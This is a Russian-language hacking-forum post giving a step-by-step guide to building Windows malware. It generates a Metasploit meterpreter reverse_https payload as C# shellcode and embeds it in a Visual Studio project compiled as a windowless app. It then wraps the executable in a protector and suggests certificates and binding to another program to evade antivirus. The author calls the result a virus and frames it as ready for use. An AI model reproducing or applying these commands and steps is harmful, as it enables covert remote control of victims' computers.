Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Metasploit payload под С#

N

Niter

Гость
Создание полезной нагрузки с metasploit из под С#.
Открываем Visual Studio  :

Visual.png


Выбираем консольное приложение 

Подключаем к коду данные библиотеки : 
 

using System.IO;
using System.Diagnostics;
Visual3.png


Теперь уберите код ,  идём в metasploit 

Visual3.png


Пишем вот такую вот команду чтоб перейти в нужный нам модуль:
 

use payload/windows/meterpreter/reverse_https
%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B180748.png

 
выставляем свои настройки такими командами:


ваш порт

set lport ваш айпи
Код:
set lhost
Теперь можно генерировать наш вирус в байт коде пишем вот такую хрень:
 
Код:
generate -t csharp  -b  '\x00\x0a\x0d'  -E -i  5 -p  x86
На выходе получаем вот такую штукенцию :

%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B181448.png

 
Выделаете этот код Ctrl+ A , копируем и идем в код .И вставляем в  static void main ,полученный нами код :

%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B181448.png



Теперь заходим в свойства проекта:

%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B181448.png




и меняем там тип выходных данных с консольного приложения на  Windows  Form,  а фреймворк ставите на  3.5

%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B181448.png


Выходим из свойства ,кликаем так же по проекту(там где вы в свойство заходили) ,и нажимаем на кнопку собрать,все проект собран и лежит в папке самого проекта.

Но теперь берем наш payload и накрываем его рандомным протектором в моем случае это NULL SHIELD 1.0 (старая хрень)

%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B191648.png


Выбираем наш файлик смерть_покемону.exe ,и нажимаем protect .



%25D0%25A1%25D0%25BA%25D1%2580%25D0%25B8%25D0%25BD%25D1%2588%25D0%25BE%25D1%2582%2B16-12-2018%2B191801.png




Вот  и все собственно. Можете ещё что-то сверху накинуть , что-то вроде темиды(если пойдет хорошо),сертификаты подвязать с клеить с программой ,вообщем можно работать. 
 

 
Последнее редактирование:


Сверху